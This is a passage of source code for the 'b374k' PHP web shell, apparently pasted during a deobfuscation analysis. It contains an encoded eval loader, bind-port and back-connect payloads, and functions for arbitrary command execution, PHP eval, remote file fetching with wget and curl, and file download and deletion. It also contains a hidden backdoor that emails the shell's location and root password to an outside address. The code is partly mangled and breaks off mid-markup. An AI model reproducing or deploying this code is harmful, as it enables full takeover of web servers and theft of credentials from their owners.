fFNGhfy/dJrISgF8CciGYY/0E6tGg5W0kQ/vnQW4BuKwARZSkhvhdEAsLoHPZHitvOC/ihal7xBhIvbK8zsCHy0RQu9AEZezd+BtYxKvGFw++H6Ec7kKDq5jgIHpJpiT8apkaL3Z5RERQ2dqt0tYj6jKVq2hTyU+zd45WJ+k4LwAD2L2FD6HVH9xe7A2Cgauagz+1SpczGhGRX0JFHTTdzJ7s96aPtgFRjkWsey/wEtt6CfLTGzeU24F+2Bh7FUax7kUyMGyri0dsuVR2g3yipINHPSna8oU/Ku/NXMMbrpsdUnKluW/UVUBVdG4DrdNCGs1WOqLqk1MM8zQB+aox9B+snatgI6DnClqj0Qb24Wew1SZnIs1oLPpEqVyV/v6f3Ke0J/2YU14PJy1eCUcythWRN3kZQ18SalvkDck2WhE+csK8VWuAPPmhd6PepNvAZ48pbZG9Aq3uJaE/a2o7Fqne0n1NvfHHsCvHgXai32/aoSE/r8RjcQ/bL+53/+H1v9neo="
  20. ;
  21. eval(base64_decode(gzuncompress(base64_decode($code))));
  22. ?>
  23.     </div>
  24.     </body>
  25.  
  26.     </html>
  27.  
  28. // end of evil code....
  29.  
  30. // Decoding first stage..
  31.  
  32. $ver = "1.01";
  33. $port_bind_bd_c = "bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY7
  34. 93jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIh
  35. ufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcw
  36. tFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWj
  37. vIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ
  38. 7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc
  39. 9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMl
  40. daHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
  41. +BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3B
  42. NtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX
  43. 6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/
  44. Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOEl
  45. QTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bj
  46. GB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  47. $back_connect = "fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1i
  48. QGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIx
  49. TnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWg
  50. qe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9
  51. iFFpuKPawILVNw==";
  52. $back_connect_c = "XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLW
  53. l/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3
  54. Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/n
  55. iYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR
  56. +B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9j
  57. L4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIf
  58. DwdHcXK1ilrfAdUbPPLw==";
  59. $back_door_c = "aWYoISRfU0VTU0lPTlsibm90aWZ5Il0pew0KJGxpbmsgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl0u
  60. JF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQokc2l0ZSA9ICAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KJHN1Ympl
  61. Y3QgPSAiU2hlbGwgVXBsb2FkZWQgLSAkc2l0ZSI7IA0KJGhlYWRlcnMgPSAiQ29udGVudC10eXBlOiB0ZXh0L2h
  62. 0bWw7IGNoYXJzZXQ9d2luZG93cy0xMjU2XHJcbiI7IA0KJFBhc3NfTWQ1ID0gbWQ1KG1kNShtZDUoJFJvb3RfUGFz
  63. cykpKTsNCiRtZXNzYWdlID0gIjxodG1sPg0KCTxib2R5Pg0KCQk8ZGl2IGFsaWduPVwibGVmdFwiIGRpcj1cI
  64. mx0clwiPg0KCQkJPGg0PlRoaXMgaXMgaW5mb3JtYXRpb24gRnJvbSA6IDxhIGhyZWY9XCIkbGlua1wiPiRzaXRlP
  65. C9hPjxiciAvPjwvaDQ+DQoJCQktLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL
  66. S0tLS0tLTxiciAvPg0KCQkJIFdlYnNpdGUgOiAJJHNpdGU8YnIgLz4NCgkJCSBTaGVsbCBUaXRsZSA6IAkkU2hl
  67. bGxfVGl0bGU8YnIgLz4NCgkJCSBTaGVsbCBPd25lciA6IAkkU2hlbGxfT3duZXI8YnIgLz4NCgkJCSBTaGVsbCA
  68. 6IAkkbGluazxiciAvPg0KCQkJIFVzZXIgOiAJJFJvb3RfTmFtZTxiciAvPg0KCQkJIFBhc3MgOiAJJFJvb3RfU
  69. GFzczxiciAvPg0KCQkJIFBhc3MgKE1kNSozKSA6IAkkUGFzc19NZDU8YnIgLz4NCgkJCS0tLS0tLS0tLS0tLS0tLS
  70. 0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tPGJyIC8+DQoJCTwvZGl2Pg0KCTwvYm9keT4NCjwv
  71. aHRtbD4iOw0KQG1haWwoImJoc2hlbEBnbWFpbC5jb20iLCRzdWJqZWN0LCRtZXNzYWdlLCRoZWFkZXJzKTsNCiRfU
  72. 0VTU0lPTlsibm90aWZ5Il0gPSB0cnVlOw0KfQ==";
  73.  
  74. if (isset($_GET['do']) == 'login') {
  75.     if ($_POST['uname'] == $Root_Name && $_POST['pword'] == $Root_Pass) {
  76.         $_SESSION['U_name'] = $_POST['uname'];
  77.         $_SESSION['U_pass'] = md5(md5(md5($_POST['pword'])));
  78.     } else {
  79.         $err = '-> Login Faild !<br />';
  80.     }
  81. }
  82. if (isset($_SESSION['U_name']) and isset($_SESSION['U_pass']) or isset($Locked) and $Locked = false) {
  83.     if ($_SESSION['U_name'] == $Root_Name && $_SESSION['U_pass'] == md5(md5(md5($Root_Pass))) or isset($Locked) and $Locked = false) {
  84.         $is_login = true;
  85.     } else {
  86.         $is_login = false;
  87.     }
  88. } else {
  89.     $is_login = false;
  90. }
  91. eval(base64_decode($back_door_c));
  92. if ($is_login == true) {
  93.     function magicboom($text) {
  94.         if (!get_magic_quotes_gpc()) {
  95.             return $text;
  96.         }
  97.         return stripslashes($text);
  98.     }
  99.  
  100.     function showdir($pwd, $prompt) {
  101.         $fname = array();
  102.         $dname = array();
  103.         if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  104.         else $posix = FALSE;
  105.         $user = "????:????";
  106.         if ($dh = opendir($pwd)) {
  107.             while ($file = readdir($dh)) {
  108.                 if (is_dir($file)) {
  109.                     $dname[] = $file;
  110.                 }
  111.                 elseif(is_file($file)) {
  112.                     $fname[] = $file;
  113.                 }
  114.             }
  115.             closedir($dh);
  116.         }
  117.         sort($fname);
  118.         sort($dname);
  119.         $path = @explode(DIRECTORY_SEPARATOR, $pwd);
  120.         $tree = @sizeof($path);
  121.         $parent = "";
  122.         $buff = "<form action=\"?y=".$pwd.
  123.         "&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  124.                 <table class=\"cmdbox\" style=\"width:50%;\">
  125.                 <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
  126.                 <input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  127.                 </form>
  128.                 <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  129.                 <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  130.         "\" />
  131.  
  132.                 <tr><td>view file/folder</td><td>
  133.                 <input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd.
  134.         "\" />
  135.                 <input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  136.                 </form></table><table class=\"explore\"> <tr>
  137.                 <th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th>
  138.                 <th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";
  139.         if ($tree > 2)
  140.             for ($i = 0; $i < $tree - 2; $i++)
  141.                 $parent. = $path[$i].DIRECTORY_SEPARATOR;
  142.         else $parent = $pwd;
  143.         foreach($dname as $folder) {
  144.             if ($folder == ".") {
  145.                 if (!$win && $posix) {
  146.                     $name = @posix_getpwuid(@fileowner($folder));
  147.                     $group = @posix_getgrgid(@filegroup($folder));
  148.                     $owner = $name['name'].
  149.                     "<span class=\"gaya\"> : </span>".$group['name'];
  150.                 } else {
  151.                     $owner = $user;
  152.                 }
  153.                 $buff. = "<tr><td><a href=\"?y=".$pwd.
  154.                 "\">$folder</a></td><td>LINK</td>
  155.  
  156.                                         <td style=\"text-align:center;\">".$owner.
  157.                 "</td><td>
  158.                                         ".get_perms($pwd).
  159.                 "</td><td style=\"text-align:center;\">
  160.                                         ".date("d-M-Y H:i", @filemtime($pwd)).
  161.                 "</td><td><span id=\"titik1\">
  162.                                         <a href=\"?y=$pwd&edit=".$pwd.
  163.                 "newfile.php\">newfile</a> |
  164.                                         <a href=\"javascript:tukar('titik1','titik1_form');\">
  165.                                         newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  166.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  167.                 "\" />
  168.                                         <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  169.  
  170.                                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  171.                                         </form></td></tr> ";
  172.             }
  173.             elseif($folder == "..") {
  174.                 if (!$win && $posix) {
  175.                     $name = @posix_getpwuid(@fileowner($folder));
  176.                     $group = @posix_getgrgid(@filegroup($folder));
  177.                     $owner = $name['name'].
  178.                     "<span class=\"gaya\"> : </span>".$group['name'];
  179.                 } else {
  180.                     $owner = $user;
  181.                 }
  182.                 $buff. = "<tr><td><a href=\"?y=".$parent.
  183.                 "\">$folder</a></td>
  184.                                         <td>LINK</td><td style=\"text-align:center;\">".$owner.
  185.                 "</td>
  186.                                         <td>".get_perms($parent).
  187.                 "</td><td style=\"text-align:center;\">
  188.  
  189.                                         ".date("d-M-Y H:i", @filemtime($parent)).
  190.                 "</td><td>
  191.                                         <span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent.
  192.                 "newfile.php\">
  193.                                         newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  194.                                         <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  195.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd.
  196.                 "\" />
  197.                                         <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  198.                                         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  199.                                         </form> </td></tr>";
  200.             } else {
  201.                 if (!$win && $posix) {
  202.                     $name = @posix_getpwuid(@fileowner($folder));
  203.                     $group = @posix_getgrgid(@filegroup($folder));
  204.                     $owner = $name['name'].
  205.                     "<span class=\"gaya\"> :
  206.                                                 </span>".$group['name'];
  207.                 } else {
  208.                     $owner = $user;
  209.                 }
  210.                 $buff. = "<tr><td><a id=\"".clearspace($folder).
  211.                 "_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR.
  212.                 "\">
  213.  
  214.                                         [ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder).
  215.                 "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder.
  216.                 "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".
  217.                 $folder.
  218.                 "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  219.                                         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder).
  220.                 "_form','".clearspace($folder).
  221.                 "_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">".$owner.
  222.                 "</td><td>".get_perms($pwd.$folder).
  223.                 "</td><td style=\"text-align:center;\">".date("d-M-Y H:i", @filemtime($folder)).
  224.                 "</td><td><a href=\"javascript:tukar('".clearspace($folder).
  225.                 "_link','".clearspace($folder).
  226.                 "_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder.
  227.                 "\">delete</a></td></tr>";
  228.             }
  229.         }
  230.         foreach($fname as $file) {
  231.             $full = $pwd.$file;
  232.             if (!$win && $posix) {
  233.                 $name = @posix_getpwuid(@fileowner($file));
  234.                 $group = @posix_getgrgid(@filegroup($file));
  235.                 $owner = $name['name'].
  236.                 "<span class=\"gaya\"> : </span>".$group['name'];
  237.             } else {
  238.                 $owner = $user;
  239.             }
  240.             $buff. = "<tr><td><a id=\"".clearspace($file).
  241.             "_link\" href=\"?y=$pwd&view=$full\">$file</a>
  242.  
  243.                                 <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file).
  244.             "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  245.                                 <input type=\"hidden\" name=\"oldname\" value=\"".$file.
  246.             "\" style=\"margin:0;padding:0;\" />
  247.                                 <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file.
  248.             "\" />
  249.                                 <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  250.                                 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file).
  251.             "_link','".clearspace($file).
  252.             "_form');\" /> </form> </td><td>".ukuran($full).
  253.             "</td><td style=\"text-align:center;\">".$owner.
  254.             "</td><td>".get_perms($full).
  255.             "</td><td style=\"text-align:center;\">".date("d-M-Y H:i", @filemtime($full)).
  256.             "</td>
  257.                                 <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file).
  258.             "_link','".clearspace($file).
  259.             "_form');\">rename</a>
  260.                                 | <a href=\"?y=$pwd&delete=$full\">delete</a> |
  261.                                 <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
  262.         }
  263.         $buff. = "</table>";
  264.         return $buff;
  265.     }
  266.  
  267.     function ukuran($file) {
  268.         if ($size = @filesize($file)) {
  269.             if ($size <= 1024) {
  270.                 return $size;
  271.             } else {
  272.                 if ($size <= 1024 * 1024) {
  273.                     $size = @round($size / 1024, 2);
  274.                     return "$size kb";
  275.                 } else {
  276.                     $size = @round($size / 1024 / 1024, 2);
  277.                     return "$size mb";
  278.                 }
  279.             }
  280.         } else {
  281.             return "???";
  282.         }
  283.     }
  284.  
  285.     function exe($cmd) {
  286.         if (function_exists('system')) {@
  287.             ob_start();@
  288.             system($cmd);
  289.             $buff = @ob_get_contents();@
  290.             ob_end_clean();
  291.             return $buff;
  292.         }
  293.         elseif(function_exists('exec')) {@
  294.             exec($cmd, $results);
  295.             $buff = "";
  296.             foreach($results as $result) {
  297.                 $buff. = $result;
  298.             }
  299.             return $buff;
  300.         }
  301.         elseif(function_exists('passthru')) {@
  302.             ob_start();@
  303.             passthru($cmd);
  304.             $buff = @ob_get_contents();@
  305.             ob_end_clean();
  306.             return $buff;
  307.         }
  308.         elseif(function_exists('shell_exec')) {
  309.             $buff = @shell_exec($cmd);
  310.             return $buff;
  311.         }
  312.     }
  313.  
  314.     function tulis($file, $text) {
  315.         $textz = gzinflate(base64_decode($text));
  316.         if ($filez = @fopen($file, "w")) {@
  317.             fputs($filez, $textz);@
  318.             fclose($file);
  319.         }
  320.     }
  321.  
  322.     function ambil($link, $file) {
  323.         if ($fp = @fopen($link, "r")) {
  324.             while (!feof($fp)) {
  325.                 $cont. = @fread($fp, 1024);
  326.             }@
  327.             fclose($fp);
  328.             $fp2 = @fopen($file, "w");@
  329.             fwrite($fp2, $cont);@
  330.             fclose($fp2);
  331.         }
  332.     }
  333.  
  334.     function which($pr) {
  335.         $path = exe("which $pr");
  336.         if (!empty($path)) {
  337.             return trim($path);
  338.         } else {
  339.             return trim($pr);
  340.         }
  341.     }
  342.  
  343.     function download($cmd, $url) {
  344.         $namafile = basename($url);
  345.         switch ($cmd) {
  346.         case 'wwget':
  347.             exe(which('wget').
  348.                 " ".$url.
  349.                 " -O ".$namafile);
  350.             break;
  351.         case 'wlynx':
  352.             exe(which('lynx').
  353.                 " -source ".$url.
  354.                 " > ".$namafile);
  355.             break;
  356.         case 'wfread':
  357.             ambil($wurl, $namafile);
  358.             break;
  359.         case 'wfetch':
  360.             exe(which('fetch').
  361.                 " -o ".$namafile.
  362.                 " -p ".$url);
  363.             break;
  364.         case 'wlinks':
  365.             exe(which('links').
  366.                 " -source ".$url.
  367.                 " > ".$namafile);
  368.             break;
  369.         case 'wget':
  370.             exe(which('GET').
  371.                 " ".$url.
  372.                 " > ".$namafile);
  373.             break;
  374.         case 'wcurl':
  375.             exe(which('curl').
  376.                 " ".$url.
  377.                 " -o ".$namafile);
  378.             break;
  379.         default:
  380.             break;
  381.         }
  382.         return $namafile;
  383.     }
  384.  
  385.     function get_perms($file) {
  386.         if ($mode = @fileperms($file)) {
  387.             $perms = '';
  388.             $perms. = ($mode & 00400) ? 'r' : '-';
  389.             $perms. = ($mode & 00200) ? 'w' : '-';
  390.             $perms. = ($mode & 00100) ? 'x' : '-';
  391.             $perms. = ($mode & 00040) ? 'r' : '-';
  392.             $perms. = ($mode & 00020) ? 'w' : '-';
  393.             $perms. = ($mode & 00010) ? 'x' : '-';
  394.             $perms. = ($mode & 00004) ? 'r' : '-';
  395.             $perms. = ($mode & 00002) ? 'w' : '-';
  396.             $perms. = ($mode & 00001) ? 'x' : '-';
  397.             return $perms;
  398.         } else {
  399.             return "??????????";
  400.         }
  401.     }
  402.  
  403.     function clearspace($text) {
  404.         return str_replace(" ", "_", $text);
  405.     }
  406.  
  407.     function rapih($text) {
  408.         return trim(str_replace("<br />", "", $text));
  409.     }
  410.     if (isset($_GET['dl']) && ($_GET['dl'] != "")) {
  411.         $file = $_GET['dl'];
  412.         $filez = @file_get_contents($file);
  413.         header("Content-type: application/octet-stream");
  414.         header("Content-length: ".strlen($filez));
  415.         header("Content-disposition: attachment; filename=\"".basename($file).
  416.             "\";");
  417.         echo $filez;
  418.         exit;
  419.     }
  420.     elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")) {
  421.         $file = $_GET['dlgzip'];
  422.         $filez = gzencode(@file_get_contents($file));
  423.         header("Content-Type:application/x-gzip\n");
  424.         header("Content-length: ".strlen($filez));
  425.         header("Content-disposition: attachment; filename=\"".basename($file).
  426.             ".gz\";");
  427.         echo $filez;
  428.         exit;
  429.     }
  430.     if (isset($_GET['img'])) {@
  431.         ob_clean();
  432.         $d = magicboom($_GET['y']);
  433.         $f = $_GET['img'];
  434.         $inf = @getimagesize($d.$f);
  435.         $ext = explode($f, ".");
  436.         $ext = $ext[count($ext) - 1];@
  437.         header("Content-type: ".$inf["mime"]);@
  438.         header("Cache-control: public");@
  439.         header("Expires: ".date("r", mktime(0, 0, 0, 1, 1, 2030)));@
  440.         header("Cache-control: max-age=".(60 * 60 * 24 * 7));@
  441.         readfile($d.$f);
  442.         exit;
  443.     }
  444.     $software = getenv("SERVER_SOFTWARE");
  445.     if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
  446.     else $safemode = FALSE;
  447.     $system = @php_uname();
  448.     if (strtolower(substr($system, 0, 3)) == "win") $win = TRUE;
  449.     else $win = FALSE;
  450.     if (isset($_GET['y'])) {
  451.         if (@is_dir($_GET['view'])) {
  452.             $pwd = $_GET['view'];@
  453.             chdir($pwd);
  454.         } else {
  455.             $pwd = $_GET['y'];@
  456.             chdir($pwd);
  457.         }
  458.     }
  459.     if (!$win) {
  460.         if (!$user = rapih(exe("whoami"))) $user = "";
  461.         if (!$id = rapih(exe("id"))) $id = "";
  462.         $prompt = $user.
  463.         " \$ ";
  464.         $pwd = @getcwd().DIRECTORY_SEPARATOR;
  465.     } else {
  466.         $user = @get_current_user();
  467.         $id = $user;
  468.         $prompt = $user.
  469.         " >";
  470.         $pwd = realpath(".").
  471.         "\\";
  472.         $v = explode("\\", $d);
  473.         $v = $v[0];
  474.         foreach(range("A", "Z") as $letter) {
  475.             $bool = @is_dir($letter.
  476.                 ":\\");
  477.             if ($bool) {
  478.                 $letters. = "<a href=\"?y=".$letter.
  479.                 ":\\\">[ ";
  480.                 if ($letter.
  481.                     ":" != $v) {
  482.                     $letters. = $letter;
  483.                 } else {
  484.                     $letters. = "<span class=\"gaya\">".$letter.
  485.                     "</span>";
  486.                 }
  487.                 $letters. = " ]</a> ";
  488.             }
  489.         }
  490.     }
  491.     if (function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  492.     else $posix = FALSE;
  493.     $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  494.     $my_ip = $_SERVER['REMOTE_ADDR'];
  495.     $bindport = "13123";
  496.     $bindport_pass = "b374k";
  497.     $pwds = explode(DIRECTORY_SEPARATOR, $pwd);
  498.     $pwdurl = "";
  499.     for ($i = 0; $i < sizeof($pwds) - 1; $i++) {
  500.         $pathz = "";
  501.         for ($j = 0; $j <= $i; $j++) {
  502.             $pathz. = $pwds[$j].DIRECTORY_SEPARATOR;
  503.         }
  504.         $pwdurl. = "<a href=\"?y=".$pathz.
  505.         "\">".$pwds[$i].
  506.         " ".DIRECTORY_SEPARATOR.
  507.         " </a>";
  508.     }
  509.     if (isset($_POST['rename'])) {
  510.         $old = $_POST['oldname'];
  511.         $new = $_POST['newname'];@
  512.         rename($pwd.$old, $pwd.$new);
  513.         $file = $pwd.$new;
  514.     }
  515.     $buff = $software.
  516.     "<br />";
  517.     $buff. = $system.
  518.     "<br />";
  519.     if ($id != "") $buff. = $id.
  520.     "<br />";
  521.     $buff. = "server ip : ".$server_ip.
  522.     " <span class=\"gaya\">|</span> your ip : ".$my_ip.
  523.     "<br />";
  524.     if ($safemode) $buff. = "safemode <span class=\"gaya\">ON</span><br />";
  525.     else $buff. = "safemode <span class=\"gaya\">OFF<span><br />";
  526.     $buff. = $letters.
  527.     " > ".$pwdurl; ?> < html > < head > < title > :: <?= $Shell_Title ?> :: < /title>
  528.         <script type="text/javascript
  529.     ">
  530.         function tukar(lama,baru){
  531.                 document.getElementById(lama).style.display = 'none';
  532.                 document.getElementById(baru).style.display = 'block';
  533.         }
  534.         </script>
  535.         <style type="
  536.     text / css ">
  537.         body{ background:#000000;; }
  538.         a { text-decoration:none; }
  539.         a:hover{ border-bottom:1px solid #4C83AF; }
  540.         *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  541.         #menu{ background:#111111; margin:8px 2px 4px 2px; }
  542.         #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
  543.         #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; }
  544.         .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; }
  545.         .main { width:100%; }
  546.         .gaya { color: #4C83AF; }
  547.         .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
  548.         .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; }
  549.         .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; }
  550.         .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; }
  551.         .cmdbox{ width:100%; }
  552.         .head_info{ padding: 0 4px; }
  553.         .b1{ font-size:30px; padding:0; color:#444444; }
  554.         .b2{ font-size:30px; padding:0; color: #333333; }
  555.         .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
  556.         .phpinfo table{ width:100%; padding:0 0 0 0; }
  557.         .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; }
  558.         .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; }
  559.         .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  560.         .explore{ width:100%; }
  561.         .explore a { text-decoration:none; }
  562.         .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; }
  563.         .explore th{ padding:3px 8px; font-weight:normal; }
  564.         .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; }
  565.         .explore tr:hover{ background:#111111; }
  566.         .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
  567.         .sembunyi{ display:none; padding:0;margin:0; }
  568.         </style>
  569.         </head>
  570.         <body onLoad="
  571.     document.getElementById('cmd').focus();
  572.     ">
  573.         <div class="
  574.     main ">
  575.          <!-- head info start here -->
  576.          <div class="
  577.     head_info ">
  578.          <table><tr><td>
  579.          <table class="
  580.     b_tbl "><tr><td>
  581.                 <a href=" ? "><span class="
  582.     b1 ">b<span class="
  583.     b2 ">374</span>k</span></a></td>
  584.                 </tr><tr><td>m1n1 <?php echo $ver; ?></td></tr>
  585.         </table></td> <td><?php echo $buff; ?></td>
  586.          </tr></table>
  587.          </div>
  588.          <!-- head info end here -->
  589.          <!-- menu start -->
  590.          <div id="
  591.     menu ">
  592.          <a href=" ? <? php echo "y=".$pwd; ?> ">explore</a>
  593.          <a href=" ? <? php echo "y=".$pwd; ?> & amp;
  594.     x = shell ">shell</a>
  595.          <a href=" ? <? php echo "y=".$pwd; ?> & amp;
  596.     x = php ">eval</a>
  597.          <a href=" ? <? php echo "y=".$pwd; ?> & amp;
  598.     x = mysql ">mysql</a>
  599.  
  600.          <a href=" ? <? php echo "y=".$pwd; ?> & amp;
  601.     x = phpinfo ">phpinfo</a>
  602.          <a href=" ? <? php echo "y=".$pwd; ?> & amp;
  603.     x = netsploit ">netsploit</a>
  604.          <a href=" ? <? php echo "y=".$pwd; ?> & amp;
  605.     x = upload ">upload</a>
  606.          <a href=" ? <? php echo "y=".$pwd; ?> & amp;
  607.     x = mail ">mail</a>
  608.          </div>
  609.          <!-- menu end -->
  610.          <?php
  611.          if(isset($_GET['x']) && ($_GET['x'] == 'php')){
  612.          ?> <form action=" ? y = <? php echo $pwd; ?> & amp;
  613.     x = php " method="
  614.     post ">
  615.          <table class="
  616.     cmdbox "> <tr><td>
  617.  
  618.          <textarea class="
  619.     output " name="
  620.     cmd " id="
  621.     cmd ">
  622.          <?php
  623.                 if(isset($_POST['submitcmd'])) {
  624.                         echo eval(magicboom($_POST['cmd']));
  625.                 } else {
  626.                         echo "
  627.     echo file_get_contents('/etc/passwd');
  628.     ";
  629.                 }
  630.                 ?>
  631.         </textarea>
  632.                 <tr><td>
  633.                 <input style="
  634.     width : 19 % ;
  635.     " class="
  636.     inputzbut " type="
